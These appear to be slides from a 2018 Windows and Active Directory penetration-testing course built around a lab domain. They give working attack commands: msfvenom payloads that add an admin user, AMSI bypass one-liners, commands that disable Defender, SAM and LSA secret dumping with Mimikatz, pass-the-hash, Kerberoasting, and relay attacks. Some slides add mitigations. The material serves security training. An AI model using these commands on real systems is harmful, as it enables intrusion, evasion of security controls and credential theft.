• Try out different methods to get around AppLocker/GPO policies

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: Full Disclosure
• Bob is a member of plum\restricted_access

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AppLocker: FAILSAFE
If, for any reason, you have not managed to execute code, the following failsafe has
been put into place

Logout from Bob’s RDP session and login as Alice - Alice is not as restricted by
AppLocker policies

• Username: plum\alice
• Password: Password12345!

IMPORTANT: Within the following challenges you will be required to substitute

C:\Users\Bob for C:\Users\Alice

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Domain controller for plum.local ● Host is a member of plum.local

● Through enumeration we found ● Gained RDP access via:

plum\bob is a valid account ○ plum\bob (Summer18)

● Overcame AppLocker restrictions and

can run PowerShell scripts

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Remote Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: Exploit Code
• Exposed and vulnerable services; known OS vulnerabilities and unpatched systems
• MS17-010 the new MS08-067!
• Windows XP/2k3 - Windows 10/2k16

• Exploit video showing Fuzzbunch & EternalBlue - https://vimeo.com/213515673

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Windows Remote Exploitation: Serialization
• DCOM Uses serialization to communicate between processes

• CVE-2018-0824
– A remote code execution vulnerability exists in "Microsoft COM for Windows"
when it fails to properly handle serialized objects. An attacker who successfully
exploited the vulnerability could use a specially crafted file or script to perform
actions.

• Remote Code Execution but with user interaction as per the current PoC’s in the
Wild.

Ref: https://codewhitesec.blogspot.com/2018/07/lethalhta.html

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: Responder
• https://github.com/lgandx/Responder

• ‘…Responder an LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS

Name Service) and mDNS (Multicast Domain Name System) poisoner. It will answer
to specific NBT-NS queries based on their name suffix…’

• A multitude of options are available:

– SMB Auth Server
– WPAD Proxy Server
– HTTP/HTTPS Auth Servers
– FTP/POP3/IMAP/SMTP and DNS Servers

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: Responder
The Attack:
• A request for \\shared originates from 192.168.0.8

• 192.168.0.3 (a system running Responder) replies to NBT-NS, LLMNR and SMB

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: MultiRelay
• A tool to relay NTLMv1 & NTLMv2 authentication
• http://g-laurent.blogspot.co.uk/2016/10/introducing-responder-multirelay-10.html

The Attack:
1. Verify the target doesn’t have SMB signing enabled (MultiRelay checks for this)
2. Use Responder to poison responses (NBNS/LLMNR)
3. Run MultiRelay in tandem - this will be waiting for incoming connections
4. A privileged (or specifically targeted) user falls victim to Responder
5. Authentication is relayed to the chosen target

Attacker > Target A (LLMNR poisoned) > SMB auth relayed to Target B

https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: MultiRelay

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: MultiRelay
Attacker: 192.168.10.208
Relay Host: 192.168.10.17
Victim: 192.168.11.17

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: Mitigation
Mitigation: Responder

• Disable LLMNR and NetBIOS

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Remote Exploitation: Mitigation
Mitigation: MultiRelay

• Policy: Enable SMB Signing (enabled by default only on Domain Controllers)

*Server type or GPO Default value

Default Domain Policy Not defined

Default Domain Controller Policy Enabled

Stand-Alone Server Default Settings Not defined

Member Server Effective Default Settings Not defined

Client Computer Effective Default Settings Disabled

*[source] https://technet.microsoft.com/en-us/library/jj852239(v=ws.11).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Privilege Escalation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Privilege Escalation: Techniques
• Low hanging fruit:
– Clear text passwords in files/scripts/registry
– Generous file permissions (verify items such as C:\, startup folder/programs)

• Focused attacks:
– Weak service configurations (permissions/binaries) and unquoted paths
– DLL hijacking (insecure library loading)
– Local exploits (e.g. MS16-032)
– Name resolution poisoning (NBT-NS/LLMNR)
– Kerberoasting
– Many, many more...
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Windows Services: Interaction
• General commands/tools:
– MMC/GUI: services.msc
– Running services: net start
– Details on a specific service: sc qc %service_name%

• Using PowerShell:
– List running and stopped services: Get-Service
– Query a particular state:
Get-Service | Where-Object {$_.status -eq "stopped"}
– Query a particular service:
Get-Service | Where-Object {$_.name -eq "AppIDSvc"}

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Services: Exploitation
• Service binary in user writable location

• Replace binary with an attacker generated payload

• When the service runs it will execute your binary under the context of the account
that is configured to execute the legitimate service

• As a standard user you may not have permissions to start/restart services

• However, if the service is set to auto we only need to force a system reboot...

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Generating EXE Payloads: Examples
• MSFvenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
msfvenom -p windows/adduser USER=john PASS=Password123! -f
exe-service -a x86 --platform win > adduser.exe

• The exec payload signature seems ’less well known’ ;-)

msfvenom -p windows/x64/exec CMD="cmd.exe /c \"net user john
Password123! /add && net localgroup administrators john
/add\"" -f exe-service > adduser.exe

• PowerUp.ps1: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Write-ServiceBinary -ServiceName ‘$target_service’
Install-ServiceBinary –ServiceName ‘$target_service’

• Bat2Exe: https://bat2exe.codeplex.com/ || py2exe: http://www.py2exe.org/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
DLL Hijacking: Insecure Library Loading
• DLL’s are searched for in specific locations (depending on if safe DLL search mode is
enabled/disabled)
• Safe DLL search mode is enabled by default >= Windows XP SP2

• Search order (safe DLL search mode):

1. The directory from which the application loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory (CWD)
6. Directories in the PATH environment variable (system then user)

Example: PureVPN Feb-2018 found vulnerable to dll hijacking and global writable dir
http://www.defensecode.com/advisories/DC-2018-02-001-PureVPN-Windows-Privilege-Escalation.pdf

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exploit Code
• Sources: exploit-db.com / Metasploit / github.com / securityfocus.com
• Example: MS16-032 (@fuzzysec)
• Affected Systems: Windows 7 - 10 & Server 2008 - 2012 R2

PowerShell PoC https://www.exploit-db.com/exploits/39719/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Kerberoasting
What/Why/How?
• A Service Principal Name (SPN) is a unique identifier of a service instance*
• A SPN always includes the name of the host computer on which the service instance is running*
*https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx

• In basic terms: A unique mapping/association of a service on a host to a logon account

• Many SPNs exist, some common examples include CIFS and MSSQL
• Sean Metcalf has created a SPN directory @ https://adsecurity.org/?page_id=183
• If we wanted to register a SPN...
https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/register-a-service-principal-name-for-kerberos-c
onnections

Condensed Attack Overview:

1. Discover SPNs
2. Request a Kerberos ticket for the selected target (part of this ticket is encrypted with the NTLM hash
of the service account)
3. Crack offline using JTR or Hashcat!
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Kerberoasting
• Introducing: Invoke-Kerberoast
https://raw.githubusercontent.com/EmpireProject/Empire/491328aafb59e0608c4720dbe4da05b9dc00aaa5/data/module_s
ource/credentials/Invoke-Kerberoast.ps1

• Crack offline: ./hashcat64.bin -m 13100 hash wordlist.txt --rules OneRuleToRuleThemAll

• Tim Medin’s original work @ https://www.sans.org/summit-archives/file/summit-archive-1493862736.pdf

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Privilege Escalation: Other Techniques
• A few methods we haven’t discussed…

– Cleartext Passwords (rough & ready example):

Get-ChildItem "C:\" -recurse -include *.txt, *.ps1, *.vbs,*.bat |
Select-String -pattern "password" | Group-Object path | select Name

– Scheduled Tasks:
• Specific binaries/scripts being called / check permissions

– Unattended Installation Files:

• Search for clear text or Base64 encoded passwords
• unattend.xml, unattend.txt, sysprep.xml, sysprep.inf
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Privilege Escalation: Other Techniques
• Continued…

– AlwaysInstallElevated:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer

– Group Policy Preferences:

• Drives.xml, groups.xml, scheduledtasks.xml, services.xml, datasources.xml
• Search XML files for “cpassword”
• AES key published by Microsoft:
https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
• MS14-025 ‘fix’ disallows the storage of credentials
https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-prefere
nces-could-allow-elevation-of-privilege-may-13,-2014
• Exploits: Get-GPPPassword.ps1 / Metasploit / Scripts / Manual
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Privilege Escalation: Auditing
• PowerUp by @harmj0y
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

• Windows PrivEsc Check by @pentestmonkey

https://github.com/pentestmonkey/windows-privesc-check

• Manual analysis!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.3
• You have low privileged access as plum\bob to 192.168.X.17. Attempt to gain local
administrative rights on the host.

Going the extra mile:

• A domain account is vulnerable to the Kerberoasting attack - get the ticket and
crack this offline!

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Privilege Escalation: FAILSAFE
If, for any reason, you have not managed to gain administrative privileges on the host,
the following failsafe has been put into place

• Username: .\default
• Password: @dm1n

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Domain controller for plum.local ● Host is a member of plum.local

● Through enumeration we found ● Gained RDP access via:

plum\bob is a valid account ○ plum\bob (Summer18)

● Overcame AppLocker restrictions and

can run PowerShell scripts

● Escalated privs and added local admin

via weak service binary permissions
○ john (Password123!)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Antivirus/AMSI Bypass Techniques
&
Post Exploitation

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: AV Bypass
Common methods for bypassing Antivirus Products:
• Add an exclusion
• Disable AV Services
• Kill AV Processes
• Run code in memory
• Use script payloads (bat, vbs, ps1)
instead of exe
• Take the automated approach:
– Veil-Evasion: https://github.com/Veil-Framework/Veil-Evasion
– Shellter: https://www.shellterproject.com/ (supported in Kali)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: AV Bypass (Shellter)
1) Backdoor the binary 2) Check it’s clean…

Test with different AV Products

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: AV Bypass (Shellter)
3) If it doesn’t go to plan at first – test with different tools/features/payloads

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: AMSI
“...AMSI is antimalware vendor agnostic, designed to allow for the most
common malware scanning and protection techniques provided by today's
antimalware products that can be integrated into applications. It supports
a calling structure allowing for file and memory or stream scanning,
content source URL/IP reputation checks, and other techniques…”

[source] https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: Disable AMSI/AV
• Requirements: An elevated shell

Indicates whether to use real-time protection

Set-MpPreference -DisableRealtimeMonitoring $true

Indicates whether Windows Defender scans all downloaded files and attachments

Set-MpPreference -DisableIOAVProtection $true

[source] https://technet.microsoft.com/en-us/library/dn433291.aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: Bypass AMSI
• Hmm but what if we need to bypass AMSI to gain privileges?!
– Use PowerShell version 2: AMSI isn’t supported
– But on a default Windows 10 installation…

– Make use of the NULL character

http://standa-note.blogspot.co.uk/2018/02/amsi-bypass-with-null-character.html
– Code manipulation: Change the signature of the script
• Change the script name || remove comments || change function and
variable names
• An excellent write-up using these techniques
http://www.blackhillsinfosec.com/?p=5555

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Post Exploitation: Bypass AMSI
• #1 A one-liner from Matt Graeber (@mattifestation)
[Ref].Assembly.GetType('System.Management
.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue
($null,$true)

• #2 Another one-liner from @mattifestation

[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.M
anagement.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFla
gs]'NonPublic,Static').GetValue($null),0x41414141)

• Drop a custom DLL - amsi.dll - into the path from where you load your tools
(remember those DLL Hijacking slides…)
https://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Post Exploitation: Exfiltration of Credentials
On a Windows host there are a number interesting targets:

• Security Accounts Manager (SAM)

• Cached Domain Credentials
• Local Security Authority Secrets (LSASecrets)
• Active Logons

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Security Accounts Manager (SAM)
What/Where/Who is SAM?

• SAM is located at: %SystemRoot%\System32\config\SAM

• On a DC; Active Directory data is stored at: %SystemRoot%\NTDS\ntds.dit

Exlifration:
Using built-in tools: reg save HKLM\SAM SAM_SAVE

• Metasploit: Meterpreter has the ability to extract hashes via the hashdump command
• PowerShell:
–Nishang: Get-PassHashes
–Empire: Invoke-PowerDump
• A number of alternative tools are also available (samdump, pwdumpx, pwdump, fgdump, gsecdump)

Remember; the hash will be in the format:

USERNAME:RID:LM:NTLM:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:99551acff8834268e489bb3054af94fd:::
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Cached Domain Credentials
• Cached Domain Credentials are the ONLY password hashes in Windows to be
salted

• The salt is the username

• Cached Domain Credentials are encrypted with the LSA secret NL$KM, so we’ll
need to extract this value and decrypt the credentials before we can then attack
these hashes

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Local Security Authority (LSA) Secrets
• LSA secrets is protected storage and may include sensitive data such as:
– Passwords for services configured to run under the context of a user account

– Passwords configured for scheduled tasks

– and a lot more...

• PowerShell (32-bit payload):

– Enable-TSDuplicateToken originally by Truesec (also included within Nishang as
Enable-DuplicateToken) is needed to duplicate the access token of LSASS
– Get-LSASecret (within Nishang) can then be used to gather the secrets

• Mimikatz:
– privilege::debug & token::elevate
– lsadump::secrets
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Active Logons
• Certain Windows services/process store the credentials of logged-on users in memory in an
encrypted way (OS dependant)*

• These can be decrypted and the “clear-text” passwords of active logged-on users can be obtained

• >= Windows 8.1/2k12r2 by default don’t store clear text credentials in LSA memory by default
(detailed overview of OS behaviour @ https://www.slideshare.net/camsec/cleartext-and-pth-still-alive)

• If we have administrative access to a target system, we can force a change and await the user to
re-enter their credentials

[reference]: https://blogs.technet.microsoft.com/kfalde/2014/11/01/kb2871997-and-wdigest-part-1/

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Authentication
NTLM Challenge/Response*
• The client authenticates using their credentials - the hash of their password is calculated and stored. Their
username is sent in cleartext
• The server generates a 16-byte challenge
• The client encrypts the challenge with the hash of the user's password and this is the response sent to the
server
• The server then sends the username; original challenge that was sent to the client (step 2 above) and the client's
response to a domain controller (DC)
• The DC performs a lookup of the user to retrieve the hash and uses this to encrypt the challenge
• The DC then compares the two responses, i.e. the client's response with the DC’s calculated response. If they
are equal, then access is granted

*[source] https://msdn.microsoft.com/en-gb/library/windows/desktop/aa378749(v=vs.85).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Authentication

1. Username sent (hash calculated + stored locally)

2. 16-byte challenge sent to client
3. Client encrypts challenge with hash and sends back
4. Server passes (1), (2) and (3) to DC
5. DC looks up username (1), retrieves corresponding hash and encrypts the original challenge (2).
DC compares its own calculation with (3). If it’s a match, the user is who they say they are!

*[source] https://blogs.sans.org/computer-forensics/files/2012/09/netauth-5.png
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Pass the Hash (PtH)
Windows systems allow authentication using hashes - we don’t need the plaintext password!

• Metasploit:
– auxiliary/scanner/smb/smb_login (SMB)
– exploit/windows/smb/psexec (SMB)

• PowerShell:
– Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash (WMI & SMB)
– Invoke-Mimikatz - https://github.com/EmpireProject/Empire

• Mimikatz:
– sekurlsa::pth /user:kevin /domain:plum.local
/ntlm:80de0b25034cbe9a63df9d8dfcdaadf3 /run:powershell.exe

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.4
• On 192.168.X.17 gain access to the NTLM hash of plum\kevin

Exercise | Demo 5.5

• On 192.168.X.17 gain access to the cleartext password of plum\backupsvc

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Pass the Hash (PtH): Restrictions
• Microsoft introduced new restrictions in 2871997 back in 2014
*https://technet.microsoft.com/en-us/library/security/2871997.aspx

Restrictions included (amongst many others)…

*“...This feature reduces the attack surface of domain credentials in the LSA. Changes
to this feature include: prevent network logon and remote interactive logon to
domain-joined machine using local accounts...”

• So...local admin accounts can no longer remotely authenticate to a host (excluding

default RID 500)
© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.
Pass the Hash (PtH): Restrictions
• However, if we have administrative access to the host we can make a registry
change and then it’s business as usual:

“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System”

Type: DWORD (32-bit)

Name: LocalAccountTokenFilterPolicy
Data: 1

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Extra Protection
• Restricted Admin Mode:
https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in
-windows-8-1-2012-r2/

• Utilize the Protected Users group:

https://technet.microsoft.com/en-us/library/dn466518(v=ws.11).aspx
– Members can’t authenticate using NTLM, Digest Auth or CredSSP
– Passwords are not cached
– Kerberos AES support only (DES and RC4 excluded)
– Account cannot be delegated
– Reduced TGT lifetime (4 hours)

• Credential Guard has been introduced in Windows 10 Enterprise & Server 2016
https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Host is a member of plum.local

● Gained RDP access via:
● Domain controller for plum.local ○ plum\bob (Summer18)
● Through enumeration we found ● Overcame AppLocker restrictions and
plum\bob is a valid account can run PowerShell scripts
● Escalated privs and added local admin
via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via
active sessions)
○ plum\backupsvc
(%Qu1t3S3cUre3P@sS$) via
LSASecrets

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Active Directory

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Recon
• What data is useful?
– Domain password and account lockout policies
– Details on our account(s) and the permissions these have locally and within the domain
– Details on obvious customized admin enabled user accounts (adm_jsmith, localadmin etc.)
– Customized groups including nesting and inheritance
– Active Directory ACLs and delegated objects
– Password management tools/utilities (LAPS)
– Encrypted passwords in polices (Group Policy Preferences)
– Service accounts with SPNs (Kerberoasting)
– Sensitive data in scripts or config files (SYSVOL)
– Domain trusts and types

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Recon
ADRecon - https://github.com/sense-of-security/ADRecon

• Uses Microsoft Remote Server Administration Tools (RSAT) if installed, if not, it falls
back to LDAP
• Enumerates users, groups, computers, OUs, various permission assignments and
generates useful statistics
– From a non-domain joined host: .\ADRecon.ps1 -DomainController 192.168.3.215 -Credential plum\bob

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Recon
Bloodhound - https://github.com/BloodHoundAD/BloodHound
• Find the shortest path to domain pwnage!
• Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation
Ummm dele-what?

“…Active Directory delegation is critical part of many organisations' IT

infrastructure. By delegating administration, you can grant users or groups
only the permissions they need without adding users to privileged groups
(e.g., Domain Admins, Account Operators)…”*

*[source] http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions

[further info] More information on AD delegation enumeration & attacks @

http://www.blackhat.com/html/webcast/05172018-active-directory-delegation-dissected.html

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation
• What can be delegated?
– Read user information
– Create/manage users
– Create/manage groups
– Modify group membership
– Reset passwords
– + much more through custom assignments

• Custom tasks/permission assignments

– Extremely fine grained, allowing for very
specific delegation requirements

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: Why?
Why should we take an interest in how an environment has been delegated?

• Clued up organizations are minimizing the memberships of powerful groups such as

domain admins/enterprise admins. Instead (as designed) they are assigning various
delegation permissions such as ‘reset password’ to custom groups. If we compromise a
user from one of these groups, we inherit these potentially powerful permissions.

• We’re looking for mistakes, logical errors or even abuse ‘by design’ implementations.

• Redundant, legacy and weak configurations may be in place and all but forgotten.

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: Audit
• Useful tools:

– Windows Remote Administration Toolkit

https://www.microsoft.com/en-gb/download/details.aspx?id=45520

– ADACL Scanner
https://github.com/canix1/ADACLScanner

– PowerView
https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon

– Windows attacking host with Admin Privileges (PowerShell)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: Audit
• Where to go now? We have credentials (of some kind) for a number of users. It’s
worth seeing what each has access to / rights within the domain:
– bob
– backupsvc
– kevin
• Users may hold ‘standard’ domain privileges, i.e. Finance users can access financial
applications/shared directories, whatever!

• …but what about delegation rights?

– Dscals.exe (default on DC / binary in support tools)
– Active Directory Users and Computers MMC (advanced view enabled)
– PowerShell (many/varied methods)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: ADACLScan

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: Enumeration
Useful AD cmdlets

$Env:ADPS_LoadDefaultDrive = 0 Load Active Directory module and disable default drive

Import-Module ActiveDirectory

Get-ADUser Information on a specific domain user

Get-ADGroup Information on a specific group

Get-ADGroupMember Get group membership details

Get-ADPrincipalGroupMembership Get group membership details for a given user

New-ADUser Create a new domain user

Add-ADGroupMember Add user to specified group

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 1)
• Identify an account that has delegation rights within the plum.local domain

• Gain access to this account (hint: we already have the necessary data)

• Using our newly inherited rights, add a new user named pwnedX to the domain

Note: Please don’t attempt to modify existing accounts (bob/kevin)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 1) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 1) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
the Regions OU (and
below)

Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Host is a member of plum.local

● Gained RDP access via:
● Domain controller for plum.local ○ plum\bob (Summer18)
● Through enumeration we found ● Overcame AppLocker restrictions and
plum\bob is a valid account can run PowerShell scripts
● Deduce that plum\ITSupport has ● Escalated privs and added local admin
delegation rights over the Regions OU via weak service binary permissions
○ john (Password123!)
● Gained access to:
○ plum\kevin NTLM hash (via
active sessions)
○ plum\backupsvc
(%Qu1t3S3cUre3P@sS$) via
LSASecrets

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation
• So, if we find (and compromise) a member of it_support, can we:
– Reset passwords of a DA user?
– Add ourselves to privileged groups?
– err...afraid not

This is where AdminSDHolder and SDProp come in...

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AdminSDHolder and SDProp
• AdminSDHolder is a container that exists in each AD domain

• A protected group is a group that is identified as privileged. This group and all its
members should be protected from unintentional modifications

• When a group is marked as protected; AD will ensure that the owner, the ACLs and
the inheritance applied on this group are the same as those applied on
AdminSDHolder container

https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx
https://technet.microsoft.com/en-us/library/2009.09.sdadminholder.aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AdminSDHolder and SDProp
To View:
ADSI EDIT > Default Naming
Context >
DC=plum,DC=local >
CN=System >
CN=AdminSDHolder

OR

Enable Advanced Features

within dsa.msc

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

AdminSDHolder: Who/What?
Get-ADGroup -LDAPFilter "( admincount=1)" -Server 192.168.3.215 -Credential "plum\bob" | Select
SamAccountName

Get-ADUser -LDAPFilter "( admincount=1)" -Server 192.168.3.215 -Credential "plum\bob" | Select

SamAccountName

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Active Directory Delegation: Targets?
• DA may not be the end goal - ask yourself “...what is it that I want to access?...”

– The compromised account may delegate rights over departmentalized groups,

i.e. Finance/HR/Development
– Locate juicy data/target
– Who has access?
– Do we have AD delegation rights over this object?

Yes No

Profit

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2)
• Gain access to the share “\\DC01\ITSupport$\Server Management” and obtain the
trophy

Note: Please don’t attempt to modify existing accounts (bob/kevin)

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
the Regions OU (and
below)

Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
the Regions OU (and
below)

Attempt to add pwnedX user to

_the_privileged_few

Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
the Regions OU (and
below)

Attempt to add pwnedX user to

_the_privileged_few

Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
it_support has access to \\DC01\itsupport$ the Regions OU (and
below)

\\DC01\itsupport$\Server Management Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
it_support has access to \\DC01\itsupport$ the Regions OU (and
below)

But not \\DC01\itsupport$\Server Management Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
it_support & sever_management have access
the Regions OU (and
to \\DC01\itsupport$ Add pwnedX to below)
Server_Management
group

\\DC01\itsupport$\Server Management Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

 Exercise | Demo 5.6 (Part 2) Summary

Admin session > Mimikatz pth > Member of it_support

Kevin
Kevin
it_support has
delegated rights over
it_support & sever_management have access
the Regions OU (and
to \\DC01\itsupport$ Add pwnedX to below)
Server_Management
group

Server_management can access \\DC01\itsupport$\Server Create new pwnedX user under

pwnedX ou=regions,dc=plum,dc=local
Management

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Windows Exploitation Status

● Host is a member of plum.local

● Gained RDP access via:
● Domain controller for plum.local ○ plum\bob (Summer18)
● Through enumeration we found plum\bob ● Overcame AppLocker restrictions and
is a valid account can run PowerShell scripts
● Deduce that plum\ITSupport has delegation ● Escalated privs and added local admin
rights over the Regions OU via weak service binary permissions
● Used plum\kevin to add a new user to the ○ john (Password123!)
plum\server_management group and gain ● Gained access to:
access to the “Server Management” ○ plum\kevin NTLM hash (via
directory under ITSupport$ active sessions)
○ plum\backupsvc
(%Qu1t3S3cUre3P@sS$) via
LSASecrets

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Remote Services, Pivoting and Lateral
Movement

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

Knowing Your Environment: WOW64
• Windows 32 bit On Windows 64-bit

• x86 emulator that allows 32-bit Windows-based applications to run seamlessly on

64-bit Windows

• 32-bit processes cannot load 64-bit DLLs for execution, and 64-bit processes cannot
load 32-bit DLLs for execution

[Further info]: https://msdn.microsoft.com/en-us/library/windows/desktop/aa384249(v=vs.85).aspx

© Copyright 2018 NotSoSecure Global Services Limited, all rights reserved.

WOW64: For Pentesters
• Meterpreter won’t work to its full capacity:
– ‘hashdump’ and similar commands fail
